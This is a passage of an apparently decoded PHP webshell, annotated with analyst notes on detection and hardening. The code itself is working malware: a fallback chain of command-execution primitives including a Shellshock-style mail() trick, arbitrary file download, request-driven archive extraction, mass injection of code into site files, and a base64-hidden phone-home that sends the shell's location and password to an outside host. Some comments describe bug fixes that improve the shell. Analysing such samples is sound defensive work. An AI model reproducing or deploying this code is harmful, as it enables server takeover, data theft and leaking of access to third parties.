if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}

}



/**
 * Stream an arbitrary server-side file to the client as an attachment, then
 * terminate the request.
 *
 * Analyst notes:
 *  - The only caller shown on this page passes $_GET['down'] unchanged, so
 *    any file readable by the PHP process can be retrieved.
 *  - Nothing restricts the path to a base directory, and the extension and
 *    basename are placed into response headers unescaped.
 *  - Detection: web-server log entries with a "down=" query parameter holding
 *    a filesystem path, followed by a large response body.
 *
 * @param string $fd Path of the file to send.
 * @return void Does not return; calls exit after readfile().
 */
function do_down($fd){

	if(!@file_exists($fd)) msg('');

	$fileinfo = pathinfo($fd);

	header('Content-type: application/x-'.$fileinfo['extension']);

	header('Content-Disposition: attachment; filename='.$fileinfo['basename']);

	header('Content-Length: '.filesize($fd));

	@readfile($fd);

	exit;

}



/**
 * Send an in-memory byte string to the client as a file download, then
 * terminate the request.
 *
 * Analyst note: the "pack" handler near the top of this script calls this
 * with an archive built from a request-supplied directory and names the
 * attachment "<Host header>.tar.gz". Responses whose Content-Disposition
 * carries the site's own host name plus ".tar.gz" are a sign of bulk
 * collection through this shell.
 *
 * @param string $filecode Bytes to send.
 * @param string $file     File name placed, unescaped, in Content-Disposition.
 * @return void Does not return; calls exit after echoing the payload.
 */
function do_download($filecode,$file){

	header("Content-type: application/unknown");

	header('Accept-Ranges: bytes');

	header("Content-length: ".strlen($filecode));

	header("Content-disposition: attachment; filename=".$file.";");

	echo $filecode;

	exit;

}



/**
 * Heuristic encoding check on a byte string.
 *
 * Returns false for inputs shorter than 3 bytes, 1 when no byte >= 0x80 is
 * seen after the first three bytes, 2 when well-formed lead/continuation
 * pairs are at least as frequent as malformed ones, and 0 otherwise.
 *
 * The first three bytes are only compared against the UTF-8 BOM and are never
 * counted. The BOM shortcuts test for a prefix counter of 4, a value the
 * counter never reaches, so they are kept for parity but do not fire.
 *
 * @param string $text Raw bytes to inspect.
 * @return int|false 2 = looks like UTF-8, 1 = plain ASCII, 0 = other,
 *                   false = too short to judge.
 */
function TestUtf8($text)
{
    $total = strlen($text);
    if ($total < 3) {
        return false;
    }

    $bomBytes = array(0xEF, 0xBB, 0xBF);
    $bomMatched = true;
    $prefixSeen = 0;
    $previous = 0;
    $wellFormed = 0;
    $malformed = 0;
    $highBytes = 0;

    for ($pos = 0; $pos < $total; $pos++) {
        $byte = ord($text[$pos]);

        // Leading three bytes: BOM comparison only, excluded from the counts.
        if ($prefixSeen < 3) {
            $bomMatched = ($bomBytes[$prefixSeen] == $byte);
            $prefixSeen++;
            continue;
        }
        if ($prefixSeen == 4 && $bomMatched) {
            break;
        }

        if ($byte >= 0x80) {
            $highBytes++;
        }

        $isContinuation = (($byte & 0xC0) == 0x80);
        $afterLead = (($previous & 0xC0) == 0xC0);
        if ($isContinuation) {
            if ($afterLead) {
                $wellFormed++;
            } elseif (($previous & 0x80) == 0) {
                $malformed++;
            }
        } elseif ($afterLead) {
            // A lead byte that is not followed by a continuation byte.
            $malformed++;
        }

        $previous = $byte;
    }

    if ($prefixSeen == 4 && $bomMatched) {
        return 2;
    }
    if ($highBytes == 0) {
        return 1;
    }
    return ($wellFormed >= $malformed) ? 2 : 0;
}



/**
 * Normalise a path: backslashes become forward slashes, then each "//" pair
 * is collapsed to "/" in a single pass.
 *
 * @param string $string Path to normalise.
 * @return string Normalised path.
 */
function File_Str($string)
{
    $forward = str_replace('\\', '/', $string);
    return str_replace('//', '/', $forward);
}



/**
 * Write $filecode to $filename using fopen() mode $filemode, retrying once
 * after forcing the file mode to 0666.
 *
 * Analyst notes:
 *  - Same logic as do_write() in this file under a different name.
 *  - The forced 0666 mode on a freshly modified file is a file-integrity
 *    indicator worth alerting on.
 *  - The handle is opened before the chmod, so the retry cannot recover from
 *    a failed fopen(); a zero-byte write is also treated as a failure.
 *
 * @param string $filename Target path.
 * @param string $filecode Bytes to write.
 * @param string $filemode fopen() mode.
 * @return bool True when the first or the retried fwrite() reports success.
 */
function File_Write($filename,$filecode,$filemode)

{

	$key = true;

	$handle = @fopen($filename,$filemode);

	// fwrite() returning 0/false triggers the permission change and one retry.
	if(!@fwrite($handle,$filecode))

	{

		@chmod($filename,0666);

		$key = @fwrite($handle,$filecode) ? true : false;

	}

	@fclose($handle);

	return $key;

}



/**
 * Run an operating-system command through the first execution primitive that
 * is available, and return its output.
 *
 * Analyst notes (what the chain tries, in order):
 *   exec, shell_exec, system, passthru, popen, the Windows COM object
 *   "WScript.shell" (only when the script path does not start with "/"),
 *   proc_open, and finally a mail()-based fallback that places the command in
 *   an environment variable after a bash function-definition prefix and only
 *   proceeds when /bin/sh resolves to bash.
 *
 * Hardening and detection:
 *  - The chain falls through on function_exists(), so a disable_functions
 *    list that omits any one of these entries (including popen, proc_open,
 *    putenv and mail) leaves a working path. Review the whole list, and
 *    disable the COM extension on Windows hosts that do not need it.
 *  - The web-server account spawning shells, or sendmail being invoked with
 *    "-bv" from PHP, are strong process-level indicators.
 *  - The mail() fallback creates a temporary file named "data*" in the
 *    current directory and deletes it afterwards.
 *  - Only the proc_open branch HTML-escapes the output; every other branch
 *    returns it raw.
 *  - $aliases is never defined in this function, so the alias substitution
 *    in the proc_open branch is inert.
 *
 * @param string $cmd Command line, passed to the primitives unmodified.
 * @return mixed Command output; '' when no primitive was usable.
 */
function Exec_Run($cmd)

{

	$res = '';

	if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}

	elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}

	elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}

	elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}

	elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}

	elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}

	elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}

	elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("[email protected]","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}

	return $res;

}



/**
 * Derive a base directory by removing the URL directory of the running
 * script from the end of the real path of the working directory.
 *
 * Only the lengths are compared: the last strlen(dirname-part of PHP_SELF)
 * characters of realpath('./') are cut off without checking that they match.
 * The result is passed through File_Str().
 *
 * @return string Normalised path prefix.
 */
function File_Mode()
{
    $workingDir = realpath('./');
    $scriptUrl = $_SERVER['PHP_SELF'];
    $urlDir = substr($scriptUrl, 0, strrpos($scriptUrl, '/'));
    $keep = strlen($workingDir) - strlen($urlDir);
    return File_Str(substr($workingDir, 0, $keep));
}



/**
 * Return the account name owning a file on hosts whose PATH_SEPARATOR is ':'.
 *
 * On other hosts nothing is returned (null). When posix_getpwuid() is not
 * available the 'name' offset is read from the path string itself, exactly
 * as the original did.
 *
 * @param string $File Path of the file.
 * @return mixed Owner name, or null where the lookup does not apply.
 */
function GetFileOwner($File) {
    if (PATH_SEPARATOR != ':') {
        return;
    }
    if (function_exists('posix_getpwuid')) {
        $File = posix_getpwuid(fileowner($File));
    }
    return $File['name'];
}



/**
 * Return the group name owning a file on hosts whose PATH_SEPARATOR is ':'.
 *
 * On other hosts nothing is returned (null). When posix_getgrgid() is not
 * available the 'name' offset is read from the path string itself, exactly
 * as the original did.
 *
 * @param string $File Path of the file.
 * @return mixed Group name, or null where the lookup does not apply.
 */
function GetFileGroup($File) {
    if (PATH_SEPARATOR != ':') {
        return;
    }
    if (function_exists('posix_getgrgid')) {
        $File = posix_getgrgid(filegroup($File));
    }
    return $File['name'];
}



/**
 * Format a byte count with a binary unit suffix.
 *
 * Values below 1024 are printed unchanged with " B"; larger values are
 * divided by the matching power of 1024, rounded to two decimals and
 * suffixed with " K", " M", " G" or " T". Everything from 1024^4 upwards is
 * reported in " T".
 *
 * @param int|float $size Size in bytes.
 * @return string Human-readable size.
 */
function File_Size($size)
{
    if ($size < 1024) {
        return $size . " B";
    }

    $divisor = 1024;
    foreach (array("K", "M", "G") as $suffix) {
        // The next power of 1024 is the upper bound of the current unit.
        if ($size < $divisor * 1024) {
            return round($size / $divisor, 2) . " " . $suffix;
        }
        $divisor *= 1024;
    }

    return round($size / $divisor, 2) . " T";
}



/**
 * Read a whole file in binary mode and return its contents.
 *
 * The read length is the size reported by filesize(); all warnings are
 * suppressed with @.
 *
 * @param string $filename Path of the file to read.
 * @return mixed File contents as returned by fread().
 */
function File_Read($filename)
{
    $stream = @fopen($filename, "rb");
    $length = @filesize($filename);
    $contents = @fread($stream, $length);
    @fclose($stream);
    return $contents;
}



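/**
 * Convert a string, or every key and value of a (nested) array, to the
 * requested character encoding.
 *
 * The source encoding is detected per string from a fixed candidate list.
 * Changes against the original:
 *  - detection runs on each string instead of on the array argument, which
 *    mb_detect_encoding() does not accept;
 *  - each array element is converted from its own value (the original passed
 *    the whole array to mb_convert_encoding() for every element);
 *  - a string whose encoding cannot be detected is returned unchanged instead
 *    of being converted with an invalid source encoding.
 *
 * @param mixed  $data   String or array of strings/arrays.
 * @param string $output Target encoding name.
 * @return mixed Converted string, or a new array with converted keys/values.
 */
function array_iconv($data,  $output = 'utf-8') {
    $encode_arr = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP');

    if (!is_array($data)) {
        $encoded = mb_detect_encoding($data, $encode_arr);
        if ($encoded === false) {
            return $data;
        }
        return mb_convert_encoding($data, $output, $encoded);
    }

    $converted = array();
    foreach ($data as $key => $val) {
        // Integer keys carry no text; only string keys are re-encoded.
        $newKey = is_string($key) ? array_iconv($key, $output) : $key;
        $converted[$newKey] = array_iconv($val, $output);
    }
    return $converted;
}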



/**
 * Report a php.ini directive as "No", "Yes" or its raw value.
 *
 * The comparisons are loose on purpose, matching the original switch: a
 * missing directive (false) and "0" give "No", "1" gives "Yes", and anything
 * else is returned as read.
 *
 * @param string $varname Directive name passed to get_cfg_var().
 * @return mixed "No", "Yes", or the configured value.
 */
function Info_Cfg($varname)
{
    $result = get_cfg_var($varname);
    if ($result == 0) {
        return "No";
    }
    if ($result == 1) {
        return "Yes";
    }
    return $result;
}

/**
 * Report whether a function is callable in this PHP build as "Yes" or "No".
 *
 * @param string $funName Function name.
 * @return string "Yes" when function_exists() is true, otherwise "No".
 */
function Info_Fun($funName)
{
    if (function_exists($funName) !== false) {
        return "Yes";
    }
    return "No";
}



/**
 * Run an operating-system command through one explicitly chosen PHP
 * primitive and return its output.
 *
 * Analyst notes:
 *  - Unlike Exec_Run(), nothing falls through: $fun selects exactly one of
 *    exec, shell_exec, system, passthru or popen, and any other value leaves
 *    the result as ''.
 *  - Being able to pick the primitive lets an operator probe which entries a
 *    host's disable_functions list leaves open. All five names, together
 *    with proc_open, belong on that list for web workloads that never spawn
 *    processes.
 *  - In the popen case pclose() runs even when popen() failed.
 *
 * @param string $cmd Command line, passed through unmodified.
 * @param string $fun Name of the primitive to use.
 * @return mixed Command output, or '' when $fun matches no case.
 */
function do_phpfun($cmd,$fun) {

	$res = '';

	switch($fun){

		case "exec": @exec($cmd,$res); $res = join("\n",$res); break;

		case "shell_exec": $res = @shell_exec($cmd); break;

		case "system": @ob_start();	@system($cmd); $res = @ob_get_contents();	@ob_end_clean();break;

		case "passthru": @ob_start();	@passthru($cmd); $res = @ob_get_contents();	@ob_end_clean();break;

		case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))	$res .= @fread($f,1024);} @pclose($f);break;

	}

	return $res;

}



// Analyst notes: request-triggered copy of geturl(), the "phone home" path.
//  - isset() yields a boolean, and a boolean compared loosely with the
//    non-empty string 'geturl' is true whenever the parameter exists, so ANY
//    "login" query parameter runs this block, not only login=geturl.
//  - This statement is at file scope after the authenticated dispatch; whether
//    it is reachable without the password depends on the earlier exit paths
//    of the script (confirm against the full file).
//  - The base64 literal decodes to a URL-encoded string which, after
//    urldecode(), is hxxp://api.fwqadmin[.]com/api.php?u= (defanged here).
//    The shell's host/path and its password are appended, and the result is
//    handed to GetHtml(), which is defined outside this excerpt and presumably
//    performs the HTTP request.
//  - Response: block and alert on outbound requests to that host, and treat
//    the shell password as known to a third party.
if(isset($_GET['login'])=='geturl'){

    @set_time_limit(10);

	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = postpass;

    $copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA');

    $url=$copyurl.$serveru.'&passwd='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}



/**
 * Send this shell's location and password to a hard-coded remote endpoint.
 *
 * Analyst notes:
 *  - $serveru is "<Host header><script path>"; $serverp is the shell's own
 *    password constant (postpass).
 *  - The base64 literal decodes to a URL-encoded string which, after
 *    urldecode(), is hxxp://api.fwqadmin[.]com/api.php?u= (defanged here).
 *    The final URL has the form <that prefix><host/path>&passwd=<password>.
 *  - GetHtml() is defined outside this excerpt; it presumably issues the
 *    HTTP request.
 *  - This means the shell reports itself to a party other than whoever
 *    uploaded it. Outbound traffic from a web server to that host is a
 *    high-confidence indicator of this family.
 *
 * @return void
 */
function geturl(){

    @set_time_limit(10);

	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = postpass;

    $copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA');

    $url=$copyurl.$serveru.'&passwd='.$serverp;

    $url=urldecode($url);

GetHtml($url);

}



/**
 * Walk a directory (optionally recursively) and apply one bulk action,
 * selected by $type, to every file except the shell itself.
 *
 * Analyst notes, per action:
 *   "guama"    - appends "\n".$code to each file whose path contains one of
 *                the '|'-separated fragments in $filetype (see debug()).
 *                This is mass content injection; expect identical trailing
 *                snippets across many files of a site.
 *   "qingma"   - removes every occurrence of $code from files containing it.
 *   "tihuan"   - replaces $code with $filetype in files containing it.
 *   "scanfile" - lists files whose base name contains $code.
 *   "scancode" - lists files whose content contains $code.
 *   "scanphp"  - lists files with extension $code whose content matches the
 *                keyword list in muma(), with edit and delete links.
 *
 * Incident-response use: the three write actions change content through
 * do_write(), which may also force mode 0666. Compare modified files against
 * a known-good baseline rather than trusting timestamps alone. The match is
 * case-insensitive (stristr) while the replacement is case-sensitive
 * (str_replace), so "qingma"/"tihuan" can rewrite a file without changing it.
 *
 * @param string $dir      Directory to process.
 * @param string $code     Text to append, search for, or compare against.
 * @param string $type     Action name (see list above).
 * @param bool   $bool     When true, descend into subdirectories.
 * @param string $filetype Path-fragment filter ("guama") or replacement
 *                         text ("tihuan").
 * @param string $shell    Path excluded from processing; defaults to the
 *                         shell's own file.
 * @return void Progress is printed as HTML.
 */
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){

	$show = do_show($dir);

	foreach($show as $files){

		if(is_dir($files) && $bool){

			do_passreturn($files,$code,$type,$bool,$filetype,$shell);

		}else{

			// Never modify or list the shell's own file.
			if($files == $shell) continue;

			switch($type){

				case "guama":

				if(debug($files,$filetype)){

					do_write($files,"ab","\n".$code) ? html_n("--> $files<br>") : html_n("--> $files<br>");

				}

				break;

				case "qingma":

				$filecode = @file_get_contents($files);

				if(stristr($filecode,$code)){

$newcode = str_replace($code,'',$filecode);

					do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>");

				}

				break;

				case "tihuan":

				$filecode = @file_get_contents($files);

				if(stristr($filecode,$code)){

					$newcode = str_replace($code,$filetype,$filecode);

					do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>");

				}

				break;

				case "scanfile":

				$file = explode('/',$files);

				if(stristr($file[count($file)-1],$code)){

					html_a("?eanver=editr&p=$files",$files);

					echo '<br>';

				}

				break;

				case "scancode":

				$filecode = @file_get_contents($files);

				if(stristr($filecode,$code)){

					html_a("?eanver=editr&p=$files",$files);

					echo '<br>';

				}

				break;

				case "scanphp":

				$fileinfo = pathinfo($files);

				if($fileinfo['extension'] == $code){

					$filecode = @file_get_contents($files);

					if(muma($filecode,$code)){

						html_a("?eanver=editr&p=".urlencode($files),"");

						html_a("?eanver=del&p=".urlencode($files),"");

						echo $files.'<br>';

					}

				}

				break;

			}

		}

	}

}





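/**
 * Minimal streaming ZIP writer: local entries are written to the output file
 * as they are added, the central directory is buffered in memory and
 * appended by createfile().
 *
 * Changes against the decoded listing:
 *  - the stray "ERROR!" line inside adddir() (a decoder artefact that made
 *    the class unparseable) is gone;
 *  - the DOS timestamp is packed with pack('V') instead of being assembled
 *    from hex digits and passed through eval(), which also broke when the
 *    hex value had fewer than eight digits;
 *  - the compressed size is measured after the zlib header and trailer are
 *    stripped, so it matches the bytes actually stored;
 *  - startfile() no longer loops forever on absolute paths.
 */
class PHPzip
{
    /** Number of entries (files and directories) written so far. */
    public $file_count = 0;

    /** Bytes of local-entry data written; also the offset of the next entry. */
    public $datastr_len = 0;

    /** Size in bytes of the buffered central directory. */
    public $dirstr_len = 0;

    /** Unused by the methods of this class; kept for interface compatibility. */
    public $filedata = '';

    /** Path of the archive being written. */
    public $gzfilename;

    /** Write handle for the archive, or false when it could not be opened. */
    public $fp;

    /** Buffered central-directory records. */
    public $dirstr = '';

    /**
     * Convert a Unix timestamp to the packed 32-bit DOS date/time value.
     *
     * @param int $unixtime Timestamp; 0 means "now".
     * @return int DOS date in the high 16 bits, DOS time in the low 16 bits.
     */
    public function unix2DosTime($unixtime = 0)
    {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

        // The DOS epoch starts in 1980; clamp anything earlier to it.
        if ($timearray['year'] < 1980) {
            $timearray['year']    = 1980;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }

        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }

    /**
     * Open the archive for writing, creating missing parent directories.
     *
     * @param string $path Archive path.
     * @return bool True when the file could be opened.
     */
    public function startfile($path = "web.zip")
    {
        $this->gzfilename = $path;

        $parent = dirname($path);
        if ($parent !== '.' && $parent !== '' && !is_dir($parent)) {
            @mkdir($parent, 0777, true);
        }

        $this->fp = @fopen($this->gzfilename, "w");
        return $this->fp ? true : false;
    }

    /**
     * Append one deflate-compressed file entry.
     *
     * A name ending in "/" is treated as a directory and handed to adddir().
     *
     * @param string $data File contents.
     * @param string $name Entry name inside the archive.
     * @return void
     */
    public function addfile($data, $name)
    {
        $name = str_replace('\\', '/', $name);

        if (strrchr($name, '/') == '/') {
            return $this->adddir($name);
        }

        // Little-endian 32-bit DOS time/date, as the header fields expect.
        $hexdtime = pack('V', $this->unix2DosTime());

        $unc_len = strlen($data);
        $crc     = crc32($data);
        // gzcompress() emits a zlib stream; drop its 2-byte header and
        // 4-byte trailer to obtain the raw deflate data ZIP stores.
        $zdata   = substr(gzcompress($data), 2, -4);
        $c_len   = strlen($zdata);

        // Local file header, followed by the data and a repeat of CRC/sizes.
        $datastr  = "\x50\x4b\x03\x04";
        $datastr .= "\x14\x00";
        $datastr .= "\x00\x00";
        $datastr .= "\x08\x00";
        $datastr .= $hexdtime;
        $datastr .= pack('V', $crc);
        $datastr .= pack('V', $c_len);
        $datastr .= pack('V', $unc_len);
        $datastr .= pack('v', strlen($name));
        $datastr .= pack('v', 0);
        $datastr .= $name;
        $datastr .= $zdata;
        $datastr .= pack('V', $crc);
        $datastr .= pack('V', $c_len);
        $datastr .= pack('V', $unc_len);

        fwrite($this->fp, $datastr);
        $my_datastr_len = strlen($datastr);
        unset($datastr);

        // Central-directory record for this entry.
        $dirstr  = "\x50\x4b\x01\x02";
        $dirstr .= "\x00\x00";
        $dirstr .= "\x14\x00";
        $dirstr .= "\x00\x00";
        $dirstr .= "\x08\x00";
        $dirstr .= $hexdtime;
        $dirstr .= pack('V', $crc);
        $dirstr .= pack('V', $c_len);
        $dirstr .= pack('V', $unc_len);
        $dirstr .= pack('v', strlen($name));
        $dirstr .= pack('v', 0);
        $dirstr .= pack('v', 0);
        $dirstr .= pack('v', 0);
        $dirstr .= pack('v', 0);
        $dirstr .= pack('V', 32);
        // Offset of this entry's local header from the start of the archive.
        $dirstr .= pack('V', $this->datastr_len);
        $dirstr .= $name;

        $this->dirstr .= $dirstr;

        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $my_datastr_len;
    }

    /**
     * Append one directory entry (no data, all sizes zero).
     *
     * @param string $name Directory name inside the archive.
     * @return void
     */
    public function adddir($name)
    {
        $name = str_replace("\\", "/", $name);

        $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
        $datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
        $datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);

        fwrite($this->fp, $datastr);
        $my_datastr_len = strlen($datastr);
        unset($datastr);

        $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
        $dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
        $dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
        $dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;

        $this->dirstr .= $dirstr;

        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $my_datastr_len;
    }

    /**
     * Write the central directory and the end-of-archive record, then close
     * the file.
     *
     * @return void
     */
    public function createfile()
    {
        $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
                    pack('v', $this->file_count) .
                    pack('v', $this->file_count) .
                    pack('V', $this->dirstr_len) .
                    pack('V', $this->datastr_len) .
                    "\x00\x00";

        fwrite($this->fp, $this->dirstr.$endstr);
        fclose($this->fp);
    }
}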





/**
 * Extract the ZIP archive at $tmp_name into the directory $todir and print
 * navigation links.
 *
 * Security review notes:
 *  - The top-level dispatcher calls this with $_GET['unzip'] and
 *    $_GET['todir'], so both the archive path and the destination come
 *    straight from the request. This lets the shell operator unpack arbitrary
 *    content anywhere the web-server account can write.
 *  - A failed open() only echoes an empty string; execution continues into
 *    extractTo() and close() on an archive that was never opened.
 *  - $new_name is accepted but never used.
 *  - Detection: requests to a PHP script carrying both `unzip=` and `todir=`
 *    query parameters are a usable indicator for this sample.
 *
 * @param string $tmp_name Path of the archive to open.
 * @param string $new_name Unused.
 * @param string $todir    Destination directory (default 'zipfile').
 */
function start_unzip($tmp_name,$new_name,$todir='zipfile'){

$zip = new ZipArchive() ;

// No return or exit on failure; see the notes above.
if ($zip->open($tmp_name) !== TRUE) {

echo '';

}

$zip->extractTo($todir);

$zip->close();

// NOTE(review): both anchors have empty link text, presumably non-ASCII labels lost in decoding.
echo '&nbsp;&nbsp;&nbsp;<a href="?eanver=main&path='.urlencode($todir).'"></a>&nbsp;&nbsp;&nbsp;<a href="javascript:history.go(-1);"></a>';

}



/**
 * Crude signature check: report whether $filecode contains any marker string
 * listed for $filetype, using a case-insensitive substring match.
 *
 * The markers are call names typical of script backdoors in PHP, ASP, ASPX
 * and JSP. The name is presumably pinyin for "trojan". Callers are outside
 * this excerpt, so the purpose (for example, locating other shells on the
 * host) is unconfirmed.
 *
 * Returns true on the first hit and falls off the end (null) otherwise. A
 * $filetype that is not one of the four keys reads an undefined array index.
 *
 * Defender note: these substrings also match large amounts of legitimate
 * code and are trivially avoided, so they are not a sound detection rule on
 * their own.
 *
 * @param string $filecode File contents to scan.
 * @param string $filetype One of "php", "asp", "aspx", "jsp".
 */
function muma($filecode,$filetype){

	$dim = array(

	"php" => array("eval(","exec("),

	"asp" => array("WScript.Shell","execute(","createtextfile("),

	"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),

	"jsp" => array("runtime.exec(")

	);

	foreach($dim[$filetype] as $code){

		if(stristr($filecode,$code)) return true;

	}

}



/**
 * Report whether $file contains any of the '|'-separated substrings in
 * $ftype (case-insensitive).
 *
 * Returns true on the first match and null (no explicit return) otherwise.
 * Despite the name, nothing here does any debugging; it is a substring filter.
 *
 * @param string $file  Haystack, presumably a file name (callers not visible here).
 * @param string $ftype Needles separated by '|'.
 */
function debug($file,$ftype){

	$type=explode('|',$ftype);

	foreach($type as $i){

		if(stristr($file,$i))	return true;

	}

}



/*---string---*/



/**
 * Replace each "//" in $path with "/".
 *
 * This is a single str_replace() pass, so runs of three or more slashes are
 * shortened but not fully collapsed. It is not a path sanitiser: ".."
 * segments and backslashes pass through unchanged.
 */
function str_path($path){

	return str_replace('//','/',$path);

}



/**
 * Terminate the request, emitting a script that shows $msg in an alert box
 * and then navigates one step back in browser history.
 *
 * $msg is concatenated into a single-quoted JavaScript string without any
 * escaping, so a quote or a "</script>" sequence in it breaks out of the
 * literal.
 */
function msg($msg){

	die("<script>window.alert('".$msg."');history.go(-1);</script>");

}



/**
 * Return the URL-encoded parent directory of $nowpath, with backslashes
 * converted to forward slashes.
 */
function uppath($nowpath){

	$nowpath = str_replace('\\','/',dirname($nowpath));

	return urlencode($nowpath);

}



/**
 * Double every backslash in $key without re-doubling pairs that are already
 * doubled.
 *
 * Step one collapses "\\" pairs to a single backslash; step two doubles every
 * backslash that remains.
 */
function xxstr($key){

	$temp = str_replace("\\\\","\\",$key);

	$temp = str_replace("\\","\\\\",$temp);

	return $temp;

}



/*---html---*/



/**
 * Emit an anchor to $url that opens in a new window, with $name as link text.
 * Both values are interpolated into the markup without HTML escaping.
 */
function html_ta($url,$name){

	html_n("<a href=\"$url\" target=\"_blank\">$name</a>");

}



/**
 * Emit an anchor to $url with link text $name. $where is inserted verbatim
 * as extra attribute text inside the tag.
 * None of the three values is HTML-escaped.
 */
function html_a($url,$name,$where=''){

	html_n("<a href=\"$url\" $where>$name</a> ");

}



/**
 * Emit an <img> tag whose source is this script with an `img` query
 * parameter set to $url (unescaped). The top-level dispatcher answers that
 * request by calling css_img().
 */
function html_img($url){

	html_n("<img src=\"?img=$url\" border=0>");

}



/**
 * Emit a button that calls history.back().
 * NOTE(review): the button label is empty, presumably a non-ASCII caption lost in decoding.
 */
function back(){

	html_n("<input type='button' value='' onclick='history.back();'>");

}



/**
 * Emit two radio buttons that share the field name "return".
 *
 * The first carries value $v1 with label $namei and is pre-selected; the
 * second carries value $v2 with label $namet. Values and labels are not
 * HTML-escaped.
 */
function html_radio($namei,$namet,$v1,$v2){

	html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);

	html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');

}



/**
 * Emit a single <input> element.
 *
 * With $mode true the element is marked `checked` and $text follows it;
 * otherwise $text precedes it. Every argument is interpolated into the
 * markup without HTML escaping.
 */
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){

	if($mode){

		html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");

	}else{

		html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");

	}

}



/**
 * Emit the JavaScript source for three client-side helpers: base64encode(),
 * utf16to8() and utf8to16(). No <script> wrapper is written here.
 *
 * The CheckDate() helper that css_js("2") emits uses base64encode() and
 * utf16to8() to encode the 'newfile' and 'txt' form fields before it submits
 * the 'editor' form.
 *
 * Defender note: because of that client-side step, edited file content
 * reaches the server base64-encoded, so request inspection that matches on
 * plain-text PHP will not see it. Server-side decoding is outside this
 * excerpt.
 */
function html_base(){

html_n('function base64encode(str){

	var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

    var out, i, len;

    var c1, c2, c3;

    len = str.length;

    i = 0;

    out = "";

    while (i < len) {

        c1 = str.charCodeAt(i++) & 0xff;

        if (i == len) {

            out += base64EncodeChars.charAt(c1 >> 2);

            out += base64EncodeChars.charAt((c1 & 0x3) << 4);

            out += "==";

            break;

        }

        c2 = str.charCodeAt(i++);

        if (i == len) {

            out += base64EncodeChars.charAt(c1 >> 2);

            out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));

            out += base64EncodeChars.charAt((c2 & 0xF) << 2);

            out += "=";

            break;

        }

        c3 = str.charCodeAt(i++);

        out += base64EncodeChars.charAt(c1 >> 2);

        out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));

